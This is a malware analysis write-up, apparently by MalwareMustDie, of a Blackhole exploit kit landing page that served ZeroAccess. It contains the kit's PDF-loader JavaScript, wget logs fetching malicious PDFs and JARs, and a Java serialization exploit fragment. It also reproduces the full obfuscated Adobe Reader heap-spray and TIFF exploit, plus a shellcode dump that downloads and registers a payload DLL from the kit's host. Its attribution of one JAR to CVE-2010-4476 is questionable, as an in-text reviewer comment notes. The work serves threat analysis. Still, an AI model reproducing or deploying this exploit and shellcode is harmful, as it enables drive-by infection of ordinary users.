
#MalwareMustDie - BHEK "/closest/" w/ ZeroAccess pload

MalwareMustDie Feb 6th, 2013 384 Never
  1. // MalwareMustDie! @unixfreaxjp /malware]$ date
  2. // Wed Feb  6 19:57:29 JST 2013
  3. // Mission: Wacking Blackhole "/closest/" version with ZeroAccess payload
  4.  
  5. DETAILS:
  6. ===========
  7.  
  8. //Blackhole "/closest/" version, landing page url:
  9.  
  10. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
  11.  
  12. // grab..
  13.  
  14. --2013-02-06 18:32:38--  h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
  15. Resolving 3thtyjtyjcc.ns02.us... seconds 0.00, 89.253.232.149
  16. Caching 3thtyjtyjcc.ns02.us => 89.253.232.149
  17. Connecting to 3thtyjtyjcc.ns02.us|89.253.232.149|:80... seconds 0.00, connected.
  18.   :
  19. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0
  20. Referer: http://malwaremusrdie.blogspot.com
  21. User-Agent: MMD Special Wacking Browser
  22. Accept: All moronz made malwares
  23. Host: 3thtyjtyjcc.ns02.us
  24. Connection: I Keep-Alive, Malware Dies!
  25. Accept-Language: Any lang that can curse Malware Moronz!
  26. Accept-Charset: All moronz made charsets
  27.   :
  28. HTTP request sent, awaiting response...
  29.   :
  30. HTTP/1.1 200 OK
  31. Server: nginx/1.2.6
  32. Date: Wed, 06 Feb 2013 09:32:37 GMT
  33. Content-Type: text/html
  34. Connection: close
  35. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  36. Vary: Accept-Encoding
  37.   :
  38. 200 OK
  39. Length: unspecified [text/html]
  40. Saving to: `209tuj2dsljdglsgjwrigslgkjskga.php'
  41. 2013-02-06 18:32:42 (82.7 KB/s) - `209tuj2dsljdglsgjwrigslgkjskga.php' saved [110246]
  42.  
  43. ====================================================================
  44.  
  45. // same ol' plugindetect 079...here: http://pastebin.com/raw.php?i=FnaCGu5J
  46. // only the PDF infector was weaponized this time;
  47.  
// Landing-page loader (kit code, kept verbatim for analysis). Injects an
// <object type="application/pdf"> whose data URL points back at the same PHP
// endpoint; the query carries values encoded by x() (presumably the same
// base-33 encoder reproduced in the "crack logic" section below) plus the
// detected PDF reader version. pdfver is defined outside this excerpt (the
// plugindetect part linked above) — apparently an array of version parts,
// since it is join(".")-ed before encoding.
function p1(){
  var d = document.createElement("object");
  // xdibj / ecbodyd / kww carry x()-encoded values; sjcr is a fixed,
  // pre-encoded constant. This query shape (":"-separated base-33 pairs) is a
  // usable network indicator for requests to this kit.
  d.setAttribute("data", "/closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=" + x("c833f")
   + "&ecbodyd=" + x("kxg") + "&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=" + x(pdfver.join(
  ".")));
  d.setAttribute("type", "application/pdf");
  document.body.appendChild(d);
}
// Second loader, same mechanism as p1() with different parameter names
// (ycfxjsu / iiuhc / etyxhy / dwimohi) and x("l") instead of x("kxg"); this is
// the request that produced infector2.pdf in the fetch log below. pdfver and
// x() come from outside this excerpt.
function p2(){
  var d = document.createElement("object");
  d.setAttribute("data", "/closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=" + x(
  "c833f") + "&iiuhc=" + x("l") + "&etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=" + x(
  pdfver.join(".")));
  d.setAttribute("type", "application/pdf");
  document.body.appendChild(d);}
  63.  
  64. ==========MY CRACK LOGIC / YOU CAN USE AS GUIDE!!!==================
  65.  
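/**
 * The kit's query-parameter encoder, as re-derived by the analyst.
 *
 * Every UTF-16 code unit of `s` is written in base 33 (digits 0-9, then
 * a-w) and the pieces are joined with ":". Example: "c833f" becomes
 * "30:1n:1i:1i:33", the value visible in the PDF URLs below. The mapping is
 * reversible — String.fromCharCode(parseInt(piece, 33)) per piece — so
 * captured query strings of this shape can be decoded during triage; the
 * ":"-separated base-33 pairs are the artefact to match on.
 *
 * Fix over the original: `d`, `i` and `k` were assigned without `var`, i.e.
 * implicit globals that leak into the page and throw a ReferenceError in
 * strict mode / ES modules; they are now block-local. A stray empty
 * statement after the loop is dropped. Behaviour is otherwise unchanged.
 *
 * @param {string} s - text to encode
 * @returns {string} ":"-joined base-33 code units ("" for an empty input)
 */
function x(s) {
  const pieces = [];
  // Iterate by UTF-16 index (not by code point) to match the original.
  for (let i = 0; i < s.length; i += 1) {
    pieces.push(s.charCodeAt(i).toString(33));
  }
  return pieces.join(":");
}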
  75.  
// Analyst harness (not kit code): rebuilds the two PDF URLs that the landing
// page's p1()/p2() would request, so they can be fetched without a browser.
// x() is the encoder reproduced above; `pdf` is the already-encoded PDF reader
// version that the kit appends as the final parameter (decode any piece with
// String.fromCharCode(parseInt(piece, 33))).
const domain = "http://3thtyjtyjcc.ns02.us";
const pdf = "1k:1d:1f:1d:1g:1d:1f";
// Query shapes copied from p1() and p2(): fixed parameter names, x()-encoded
// values and one pre-encoded constant (sjcr / etyxhy).
const string1 = `/closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=${x("c833f")}&ecbodyd=${x("kxg")}&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=`;
const string2 = `/closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=${x("c833f")}&iiuhc=${x("l")}&etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=`;
const url1 = `${domain}${string1}${pdf}`;
const url2 = `${domain}${string2}${pdf}`;
document.write([url1, url2].join("\n"));
  82.  
  83. ===============================================
  84. // got the two PDF URLs:
  85.  
  86. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=30:1n:1i:1i:33&ecbodyd=38:3l:34&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=1k:1d:1f:1d:1g:1d:1f
  87.  
  88. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=30:1n:1i:1i:33&iiuhc=39&etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=1k:1d:1f:1d:1g:1d:1f
  89.  
  90. // fetch! fetch! fetch! fetch! fetch!
  91.  
  92. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=30:1n:1i:1i:33&ecbodyd=38:
  93. 3l:34&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  94. Referer: http://malwaremusrdie.blogspot.com
  95. User-Agent: MMD Special Wacking Browser
  96. Accept: All moronz made malwares
  97. Host: 3thtyjtyjcc.ns02.us
  98. Connection: I Keep-Alive, Malware Dies!
  99. Accept-Language: Any lang that can curse Malware Moronz!
  100. Accept-Charset: All moronz made charsets
  101.   :
  102. HTTP request sent, awaiting response...
  103.   :
  104. HTTP/1.1 200 OK
  105. Server: nginx/1.2.6
  106. Date: Wed, 06 Feb 2013 09:43:07 GMT
  107. Content-Type: application/pdf
  108. Content-Length: 20197
  109. Connection: I Keep-Alive, Malware Dies!
  110. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  111. ETag: "c0fe4b4e812db9d2d0db61922e0522ea"
  112. Last-Modified: Wed, 06 Feb 2013 09:43:13 GMT
  113. Accept-Ranges: bytes
  114.   :
  115. 200 OK
  116. Registered socket 1892 for persistent reuse.
  117. Length: 20197 (20K) [application/pdf]
  118. Saving to: `infector1.pdf'
  119. 100%[======================================>] 20,197      53.4K/s   in 0.4s
  120. 2013-02-06 18:43:10 (53.4 KB/s) - `infector1.pdf' saved [20197/20197]
  121.  
  122.  
  123. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=30:1n:1i:1i:33&iiuhc=39&
  124. etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  125. Referer: http://malwaremusrdie.blogspot.com
  126. User-Agent: MMD Special Wacking Browser
  127. Accept: All moronz made malwares
  128. Host: 3thtyjtyjcc.ns02.us
  129. Connection: I Keep-Alive, Malware Dies!
  130. Accept-Language: Any lang that can curse Malware Moronz!
  131. Accept-Charset: All moronz made charsets
  132.   :
  133. HTTP request sent, awaiting response...
  134.   :
  135. HTTP/1.1 200 OK
  136. Server: nginx/1.2.6
  137. Date: Wed, 06 Feb 2013 09:43:47 GMT
  138. Content-Type: application/pdf
  139. Content-Length: 11596
  140. Connection: I Keep-Alive, Malware Dies!
  141. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  142. Accept-Ranges: bytes
  143. Content-Disposition: inline; filename=0a08d.pdf
  144.   :
  145. 200 OK
  146. Registered socket 1892 for persistent reuse.
  147. Length: 11596 (11K) [application/pdf]
  148. Saving to: `infector2.pdf'
  149. 100%[======================================>] 11,596      --.-K/s   in 0.05s
  150. 2013-02-06 18:43:50 (221 KB/s) - `infector2.pdf' saved [11596/11596]
  151.  
  152. // check purpose... the JARS... got two.
  153.  
  154. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0
  155. Referer: http://malwaremusrdie.blogspot.com
  156. User-Agent: MMD Special Wacking Browser Java/1.7.0_11
  157. Accept: All moronz made malwares
  158. Host: 3thtyjtyjcc.ns02.us
  159. Connection: I Keep-Alive, Malware Dies!
  160. Accept-Language: Any lang that can curse Malware Moronz!
  161. Accept-Charset: All moronz made charsets
  162.   :
  163. HTTP request sent, awaiting response...
  164.   :
  165. HTTP/1.1 200 OK
  166. Server: nginx/1.2.6
  167. Date: Wed, 06 Feb 2013 09:48:35 GMT
  168. Content-Type: application/java-archive
  169. Content-Length: 26127
  170. Connection: I Keep-Alive, Malware Dies!
  171. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  172. ETag: "fa7484b3de49e3dbbb5a1f3a51ae2a76"
  173. Last-Modified: Wed, 06 Feb 2013 09:48:41 GMT
  174. Accept-Ranges: bytes
  175.   :
  176. 200 OK
  177. Registered socket 1892 for persistent reuse.
  178. Length: 26127 (26K) [application/java-archive]
  179. Saving to: `java1.jar'
  180. 100%[======================================>] 26,127      67.5K/s   in 0.4s
  181. 2013-02-06 18:48:38 (67.5 KB/s) - `java1.jar' saved [26127/26127]
  182.  
  183.  
  184. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0
  185. Referer: http://malwaremusrdie.blogspot.com
  186. User-Agent: MMD Special Wacking Browser Java/1.6.0_20
  187. Accept: All moronz made malwares
  188. Host: 3thtyjtyjcc.ns02.us
  189. Connection: I Keep-Alive, Malware Dies!
  190. Accept-Language: Any lang that can curse Malware Moronz!
  191. Accept-Charset: All moronz made charsets
  192.  
  193.   :
  194. HTTP request sent, awaiting response...
  195.   :
  196. HTTP/1.1 200 OK
  197. Server: nginx/1.2.6
  198. Date: Wed, 06 Feb 2013 09:49:01 GMT
  199. Content-Type: application/java-archive
  200. Content-Length: 16640
  201. Connection: I Keep-Alive, Malware Dies!
  202. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  203. ETag: "ba85a3efd20c73021b3680feeec19503"
  204. Last-Modified: Wed, 06 Feb 2013 09:49:07 GMT
  205. Accept-Ranges: bytes
  206.   :
  207. 200 OK
  208. Registered socket 1892 for persistent reuse.
  209. Length: 16640 (16K) [application/java-archive]
  210. Saving to: `java2.jar'
  211. 2013-02-06 18:49:05 (49.9 KB/s) - `java2.jar' saved [16640/16640]
  212.  
  213.  
  214. // JAR report...
  215.  
  216. java1.jar = java 7u10 0day...
  217.  
  218. interesting CVE found in java2.jar at mac.class,
  219. It is CVE-2010-4476, whose status is not yet released by MITRE.ORG (under review),
  220. and it is now being used by Blackhole EK to infect ZeroAccess in PDF exploits everywhere..
  221. But Oracle seems to have released the patch..
  222. Ref: http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html
  223. Ref: http://packetstormsecurity.com/files/cve/CVE-2010-4476
  224. Ref: http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/
  225.  
  226. Overview:
  227.  
  228. The Double.parseDouble w/ java.math.BigInteger method in Java Runtime Environment (JRE) in
  229. Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and
  230. 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows
  231. remote attackers to cause a denial of service via a crafted string that triggers an
  232. infinite loop of estimations during conversion to a double-precision binary floating-point
  233. number, as demonstrated using 2.2250738585072012e-308.
  234.  
  235.  
  236. // exploit...
  237.  
  238. import java.io.ByteArrayInputStream;
  239. import java.io.InputStream;
  240. import java.lang.reflect.Method;
  241. import java.math.BigInteger;
  242. import java.security.ProtectionDomain;
  243.      :
  /**
   * Builds an InputStream over a hand-assembled Java serialization stream
   * (quoted from java2.jar for analysis). The helpers hw.stb and test.iar and
   * the q2 / q3 / qqqq / zzzz / test.* fragments are defined elsewhere in the
   * JAR and are not shown here; from their use, test.iar presumably joins the
   * array with "" and hw.stb presumably converts the hex text to bytes —
   * confirm against the decompiled class.
   *
   * "ACED0005" is the hex form of ObjectOutputStream's STREAM_MAGIC (0xACED)
   * followed by STREAM_VERSION (5), the header every java.io serialized object
   * stream starts with. `c` contributes its length (hex) and its raw bytes
   * (rendered as a hex BigInteger) into the stream body.
   *
   * NOTE(review): this is serialized-object construction, which does not
   * obviously correspond to the Double.parseDouble hang described in the
   * CVE-2010-4476 overview above; worth re-checking which class the CVE
   * attribution for java2.jar rests on.
   *
   * @param c string whose length and bytes are embedded in the stream
   * @return a ByteArrayInputStream over the assembled bytes
   */
  public static InputStream qwe(String c)
  {
    String s = "ACED0005";
    return new ByteArrayInputStream(
      hw.stb(
      test.iar(new String[] {
      s, q2, q3,
      Integer.toHexString(c.length()),
      String.format("%x", new Object[] { new BigInteger(c.getBytes()) }), test.en + zzzz, test.enn2 + test.enn22, test.en2, qqqq, test.hello, "672F4F626A6563743B787071007E0003" },
      "")));  }
  254.  
  255.  
  256.  
  257. // Using the smallest PDF....
  258.  
  259. //cracked:
  260.  
// JavaScript extracted from infector2.pdf (kit code, quoted verbatim for
// analysis). The analyst's "// is a shellcode.." marker below sits inside the
// string literal as pasted, and the long hex literals were wrapped by the
// paste, so this listing is not runnable as-is.
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;   // `i` is the loop index reused by _I0() and _I3()
var x = new Array();
var y = new Array();
// _l1 / _l2: hex text later turned into bytes by _I3() and sprayed by _I0().
// Note the precedence: .split('').reverse().join('').replace(/;/g, '') binds
// to the second literal only, so the first literal is used as written while
// the second is stored reversed (and any ';' padding removed). The first
// literal is the only part that differs between _l1 and _l2 (version-specific
// values, judging by the repeated "804a" pattern); the second literal is
// shared. The hex dump further down matches this: it starts with the first
// literal's bytes and continues with the second literal read backwards
// ("...cfcf4e3866" -> 66 83 e4 fc ...), ending in the payload URL.
var _l1 = "                   // is a shellcode..
4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
0000001239804a6420600f000400004141414141414141" + "
00008667b61766d697d3c61757664662e60767678797d3475747861667629613d3d64796d607962637628613a3
0333a3f613a30333a33333a38613a3d613a3e613a33333a30333d35626479687467757623333a39613a39613a3
e613a30333d317e667f3078607e21676b637a6b676c63776962777a67637c67646a6c6374623a65747930323f2
47375637f6c636f23757e2230337e6e23636a69747a69747864733f2f2a30747478607f2a16397646cb1b5a8ac
33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c3840
65ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446c
c6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c23332767404244
7c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f686
3eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b8
3fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e5
6e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b865
15c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c0
04b80304b8460c33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
// _l2: same layout as _l1; only the first literal differs. Used by _j3() when
// _l5() reports a viewer version >= 9000 (i.e. 9.x or later).
var _l2 = "
4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
0000007188804a6420600f000400004141414141414141" + "
00008667b61766d697d3c61757664662e60767678797d3475747861667629613d3d64796d607962637628613a3
0333a3f613a30333a33333a38613a3d613a3e613a33333a30333d35626479687467757623333a39613a39613a3
e613a30333d317e667f3078607e21676b637a6b676c63776962777a67637c67646a6c6374623a65747930323f2
47375637f6c636f23757e2230337e6e23636a69747a69747864733f2f2a30747478607f2a16397646cb1b5a8ac
33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c3840
65ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446c
c6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c23332767404244
7c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f686
3eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b8
3fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e5
6e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b865
15c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c0
04b80304b8460c33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
// `app` is the PDF viewer's scripting object (Acrobat JavaScript API); only
// its viewerVersion is read, in _l5(). Aliased to hide the name.
_l3 = app;
// Filled by _I0() with 400 copies of the sprayed block.
_l4 = new Array();
// Normalises _l3.viewerVersion (e.g. "9.5") into a 4-digit integer (9500):
// drops the first "." only, right-pads with "0" to four characters, parses
// base 10. _j3() compares the result with 9000, i.e. branches on viewer
// major version < 9 versus >= 9.
function _l5(){
  var _l6 = _l3.viewerVersion.toString();
  _l6 = _l6.replace('.', '');   // string pattern: only the first "." is removed
  while (_l6.length < 4)_l6 += '0';
  return parseInt(_l6, 10)
}
// Byte-sized repeat: doubles _l8 until its UTF-16 length * 2 reaches _l9,
// then returns the first _l9 / 2 characters — a string occupying _l9 bytes
// (two bytes per character). Used by _I0() to size the spray block.
function _l7(_l8, _l9){
  while (_l8.length * 2 < _l9)_l8 += _l8;
  return _l8.substring(0, _l9 / 2)
}
// Heap spray (side effect: fills the global _l4). _I1 is the %u-escaped byte
// string produced by _j2(); unescape() turns it back into UTF-16 units. One
// 0x2000-byte block is built as those bytes followed by 0x9090 filler, grown
// to 262049 characters (524098 / 2, about 512 KB) and stored 400 times in
// _l4, each copy being the block minus its last character plus one 0x9090
// unit. Large repeated string allocation from PDF JavaScript like this is the
// behavioural signal for the spray. roteDak, dakRote, spray and loxWhee are
// implicit globals (no var); `i` is the global declared at the top.
function _I0(_I1){
  _I1 = unescape(_I1);
  roteDak = _I1.length * 2;                   // size of _I1 in bytes
  dakRote = unescape('%u9090');               // one UTF-16 unit, bytes 90 90
  spray = _l7(dakRote, 0x2000 - roteDak);     // filler up to 0x2000 bytes
  loxWhee = _I1 + spray;
  loxWhee = _l7(loxWhee, 524098);             // repeat to 262049 characters
  for (i = 0; i < 400; i ++ )_l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
// Character-sized repeat (cf. _l7, which works in bytes): doubles _I1 until
// it has at least `len` characters and returns the first `len`. _j3() uses it
// to produce 10984 characters of the base64 filler 'QUFB'.
function _I2(_I1, len){
  while (_I1.length < len)_I1 += _I1;
  return _I1.substring(0, len)
}
// Hex text -> byte string: each pair of hex digits becomes one character with
// that code (0..255). Applied to _l1 / _l2 in _j3(). ret, b, c and the loop
// index `i` are globals (no var; `i` is declared at the top of the script).
function _I3(_I1){
  ret = '';
  for (i = 0; i < _I1.length; i += 2){
    b = _I1.substr(i, 2);
    c = parseInt(b, 16);
    ret += String.fromCharCode(c);
  }
  return ret
}
// Repeating-key XOR of _I1 with _I4, character by character. In this sample
// _j3() calls it with _I4 = '': then _l9 is 0, _I6 % 0 is NaN, ''.charCodeAt(NaN)
// is NaN, and _I7 ^ NaN equals _I7 (NaN coerces to 0 for ^) — so the call is
// an identity and the bytes from _I3() pass through unchanged. _I5 .. _I8 and
// _l9 are implicit globals.
function _ji1(_I1, _I4){
  _I5 = '';
  for (_I6 = 0; _I6 < _I1.length; _I6 ++ ){
    _l9 = _I4.length;
    _I7 = _I1.charCodeAt(_I6);
    _I8 = _I4.charCodeAt(_I6 % _l9);
    _I5 += String.fromCharCode(_I7 ^ _I8);
  }
  return _I5
}
// Hex of a number, zero-padded to an even number of digits (a byte value
// 0..255 becomes exactly two digits). Helper for _j2(). _j0, _j1 and _I5 are
// implicit globals.
function _I9(_I6){
  _j0 = _I6.toString(16);
  _j1 = _j0.length;
  _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
  return _I5
}
// Byte string -> "%uXXXX" escape sequence: each pair of characters (b0, b1)
// becomes '%u' + hex(b1) + hex(b0), i.e. little-endian 16-bit units, which is
// what unescape() in _I0() reassembles. _j3() pads the input to even length
// first. _I5 and _I6 are implicit globals.
function _j2(_I1){
  _I5 = '';
  for (_I6 = 0; _I6 < _I1.length; _I6 += 2){
    _I5 += '%u';
    _I5 += _I9(_I1.charCodeAt(_I6 + 1));
    _I5 += _I9(_I1.charCodeAt(_I6))
  }
  return _I5
}
// Exploit driver. Picks a version branch via _l5() (< 9000 means a viewer
// before 9.x): a base64 blob _j5 and one of the hex strings _l1 / _l2. The hex
// is turned into bytes (_I3), XORed with an empty key (_ji1 — an identity
// here, see its comment), padded to even length, %u-escaped (_j2) and handed
// to the heap spray (_I0). Separately it assembles _ll1 = 'SUkqADggAABB'
// (base64 of "II*\0" — a little-endian TIFF header, consistent with the
// analyst's LibTiff note) + 10984 characters of 'QUFB' filler + the _ll0 block
// + _j5, and assigns it to ImageField1.rawValue, presumably an XFA image
// field, so the crafted TIFF is delivered as a form-field value. The
// `with ({k: _ll3}) _I0(k)` form is only an obfuscated way to call _I0(_ll3).
// All _j4 .. _ll3 names are implicit globals.
function _j3(){   // same usage of LibTiff...
  _j4 = _l5();
  // Analyst marker follows on the if line; not valid JavaScript as pasted.
  if (_j4 < 9000){ /<=========PDF VER...
    _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
    _j6 = _l1;
    _j7 = _I3(_j6)
  }
  else {
    _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
    _j6 = _l2;
    _j7 = _I3(_j6)
  }
  _j8 = 'SUkqADggAABB';
  _j9 = _I2('QUFB', 10984);
  // _ll0 was wrapped by the paste; as written it is one base64 string.
  _ll0 = '
QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA
EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  _ll1 = _j8 + _j9 + _ll0 + _j5;
  _ll2 = _ji1(_j7, '');
  if (_ll2.length % 2)_ll2 += unescape('%00');   // even length for 16-bit packing in _j2()
  _ll3 = _j2(_ll2);
  with ({
    k : _ll3
  }
  )_I0(k);
  ImageField1.rawValue = _ll1
}
// Entry point: the script runs _j3() unconditionally when it executes.
_j3();
  385.  
  386.  
  387. // the shellcode, shown as a hex / ASCII dump...
  388.  
  389.  
  390. 4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  L.`....J<.`..c.J
  391. a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  ...J0..Jn/.JAAAA
  392. 26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  &...............
  393. 12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  .9.Jd.`.....AAAA
  394. 41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  AAAAf......u4._3
  395. c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  .d.@0.@..p.V.v.3
  396. db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  .f.^<.t3,.......
  397. 8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  .@0.F9.u..4$..uQ
  398. e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  ..LQV.u<.t5x..V.
  399. 76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  v...3.IA....3...
  400. 10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  .8.t......@..;.u
  401. e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  .^.^$..f..K.F..T
  402. 24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  $...........^Y..
  403. 53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  S..h..}.3t.....h
  404. 08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  ...j.Y..........
  405. 00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  ..XPj@h....P...P
  406. 55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  U...^......hon..
  407. 68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  hurlmT........a.
  408. ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  .....r.......\$.
  409. c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  ..$regs.D$.vr32.
  410. 44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  D$..-s.Sh.....V.
  411. 8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  ..3.Q.D..wpbt.D.
  412. 05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  ..dll.D...Y...0.
  413. 44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  D..AQj.j.SWj..V.
  414. 85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  ..u.j.S.V.j....S
  415. ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  .V........G.?.u.
  416. 47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  G.?.u.j.j..V....
  417. ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  ...N.......o..3.
  418. 8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  .[..Fy6./phttp:/
  419. 2f 33 74 68 74 79 6a 74  79 6a 63 63 2e 6e 73 30  /3thtyjtyjcc.ns0
  420. 32 2e 75 73 2f 63 6c 6f  73 65 73 74 2f 32 30 39  2.us/closest/209
  421. 74 75 6a 32 64 73 6c 6a  64 67 6c 73 67 6a 77 72  tuj2dsljdglsgjwr
  422. 69 67 73 6c 67 6b 6a 73  6b 67 61 2e 70 68 70 3f  igslgkjskga.php?
  423. 76 6e 71 3d 33 30 3a 31  6e 3a 31 69 3a 31 69 3a  vnq=30:1n:1i:1i:
  424. 33 33 26 75 77 64 78 69  74 62 65 3d 33 30 3a 33  33&uwdxitbe=30:3
  425. 33 3a 31 6e 3a 31 6d 3a  31 68 3a 33 33 3a 33 30  3:1n:1m:1h:33:30
  426. 3a 31 6f 3a 33 30 3a 31  68 26 73 62 69 70 6d 69  :1o:30:1h&sbipmi
  427. 74 6d 3d 31 69 26 76 61  68 74 75 74 3d 79 78 76  tm=1i&vahtut=yxv
  428. 76 70 6e 26 64 66 75 71  6c 3d 79 6d 66 71 6b 76  vpn&dfuql=ymfqkv
  429. 68 00 00 00                                       h...            
  430.  
  431.  
  432. Payload URL:
  433. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php?vnq=30:1n: 1i:1i:33&uwdxitbe=30:33:1n:1m:1h:33:30:1o:30:1h&sbipmitm=1i&vahtut=yxvvpn&dfuql=ymfqkvh
  434.  
  435.  
  436. ---request begin---
  437. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?vnq=30:1n:%201i:1i:33&uwdxitbe=30:33:1n:1m:1h:33:30:1o:30:1h&sbipmitm=1i&vahtut=yxvvpn&dfuql=%20ymfqkvh HTTP/1.0
  438. Referer: http://malwaremusrdie.blogspot.com
  439. User-Agent: MMD Special Wacking Browser
  440. Accept: All moronz made malwares
  441. Host: 3thtyjtyjcc.ns02.us
  442. Connection: I Keep-Alive, Malware Dies!
  443. Accept-Language: Any lang that can curse Malware Moronz!
  444. Accept-Charset: All moronz made charsets
  445.   :
  446. HTTP request sent, awaiting response...
  447.   :
  448. HTTP/1.1 200 OK
  449. Server: nginx/1.2.6
  450. Date: Wed, 06 Feb 2013 10:11:48 GMT
  451. Content-Type: application/x-msdownload
  452. Content-Length: 167936
  453. Connection: I Keep-Alive, Malware Dies!
  454. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  455. Pragma: public
  456. Expires: Wed, 06 Feb 2013 10:11:54 GMT
  457. Cache-Control: must-revalidate, post-check=0, pre-check=0
